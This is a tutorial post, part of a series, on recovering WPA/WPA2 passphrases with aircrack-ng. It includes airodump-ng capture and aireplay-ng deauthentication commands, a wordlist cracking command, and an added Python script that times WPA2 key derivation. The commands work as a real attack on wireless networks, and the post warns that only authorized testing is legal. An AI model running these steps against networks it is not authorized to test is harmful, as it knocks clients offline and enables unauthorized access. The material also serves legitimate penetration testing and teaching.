Cracking WPA/WPA2 Handshakes with Aircrack-ng

Introduction

Now that you’ve learned how to capture a WPA2 handshake using deauthentication (Part 5), it’s time to crack it. This is where the real challenge begins: WPA2 doesn’t have WEP’s cryptographic weaknesses, but a clean handshake and a strong wordlist can still recover a weak passphrase.

Let’s break it down.

❓ How WPA2 Cracking Works

WPA2 uses a 4-way handshake when a device connects to the network. By capturing this handshake, we can attempt to recover the passphrase offline with a dictionary attack.

⚠️ This method doesn’t “decrypt” the network. It tests candidate passwords against the captured handshake, one by one, until one produces a match.

🧰 Tools Needed

  • Kali Linux with aircrack-ng

  • Wi-Fi adapter in monitor mode

  • Captured handshake file (.cap)

  • Wordlist (e.g., rockyou.txt)

Step-by-Step: Cracking WPA2 Handshakes

1. Capture the Handshake

As explained in Part 5, use the following command to start capturing:

sudo airodump-ng --bssid <BSSID> --channel <CH> -w handshake wlan0mon

Then, in a new terminal, trigger deauthentication:

sudo aireplay-ng --deauth 10 -a <BSSID> wlan0mon

Wait for a client to reconnect. If successful, you’ll see:

WPA handshake: <BSSID>

2. Verify the Capture

Check if the handshake was properly captured using:

aircrack-ng handshake-01.cap

If it says:

WPA handshake found

…you’re good to proceed.

3. Choose Your Wordlist

A wordlist is a text file containing thousands (or even millions) of possible passwords.

Kali comes with the popular rockyou.txt wordlist:

/usr/share/wordlists/rockyou.txt

You can also download larger lists from:

4. Crack the Handshake

Use aircrack-ng with your wordlist and captured file:

aircrack-ng -w /path/to/wordlist.txt -b <BSSID> handshake-01.cap

Explanation:

  • -w: Path to wordlist

  • -b: Target router’s MAC address (BSSID)

  • handshake-01.cap: Captured handshake file

Aircrack-ng will test each password until it finds a match.

🎉 Success!

If cracked successfully, you’ll see something like:

KEY FOUND! [ password123 ]

Tips to Improve Success

  • Cracking depends on password strength — weak ones break fast

  • Larger wordlists = higher chances, but slower

  • Use crunch or cewl to make custom wordlists

  • Capture multiple handshakes if needed — some might be cleaner
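As an added example that is not part of the original post, this Python script shows what sits behind “How WPA2 Cracking Works” and the tips above: every candidate aircrack-ng tests must first go through the PMK derivation WPA2-PSK mandates, so the per-guess cost is fixed and the size of the wordlist (and the strength of the passphrase) decides how long the run takes. The SSID, candidate strings and wordlist size below are constructed; the single known-answer vector is the one published in IEEE 802.11i.

```python
import hashlib
import time

# Added example, not from the original post or the aircrack-ng project.
# It demonstrates the per-guess cost of a WPA2-PSK dictionary attack,
# which is why weak passphrases fall fast and big wordlists run slowly.


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK Pairwise Master Key: PBKDF2-HMAC-SHA1 with the SSID as
    salt, 4096 iterations, 32-byte output (IEEE 802.11i). The handshake
    MIC can only be checked after this step, so it is the cost of one guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def known_answer_ok() -> bool:
    """Self-check against the IEEE 802.11i test vector (passphrase 'password',
    SSID 'IEEE'); a wrong derivation here would mean every guess is wasted."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return derive_pmk("password", "IEEE").hex() == expected


def measure_guess_rate(ssid: str, samples: int = 20) -> float:
    """Derive `samples` PMKs for constructed candidates and return the
    single-threaded guesses-per-second this machine manages."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"constructed-candidate-{i}", ssid)  # constructed input
    return samples / (time.perf_counter() - start)


def worst_case_seconds(wordlist_entries: int, guesses_per_second: float) -> float:
    """Time to exhaust a wordlist when the passphrase is its last entry
    (or not in it at all): linear in the number of entries."""
    return wordlist_entries / guesses_per_second


if __name__ == "__main__":
    assert known_answer_ok()
    rate = measure_guess_rate("ConstructedSSID")  # constructed SSID
    print(f"single-core rate: {rate:,.0f} guesses/s")
    for entries in (1_000, 1_000_000, 100_000_000):  # constructed sizes
        hours = worst_case_seconds(entries, rate) / 3600
        print(f"{entries:>11,} entries -> worst case {hours:,.2f} h")
```

Running it shows why a passphrase that is absent from any wordlist is safe from this attack regardless of wordlist size: the time grows with entries, not with cleverness, and only a passphrase that appears in the list can ever be found.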

Legal & Ethical Reminder

Only test on your own network or one you’ve been authorized to test. Capturing or cracking WPA2 handshakes on unauthorized networks is illegal.

Wrapping Up

You now know how to perform a dictionary attack on WPA2 handshakes using aircrack-ng — one of the most widely used methods in real-world Wi-Fi penetration testing.

Next up:
Part 8 – Bruteforcing WPA2 with Hashcat & GPU Power

We’ll take things to the next level with GPU acceleration and advanced cracking using Hashcat.
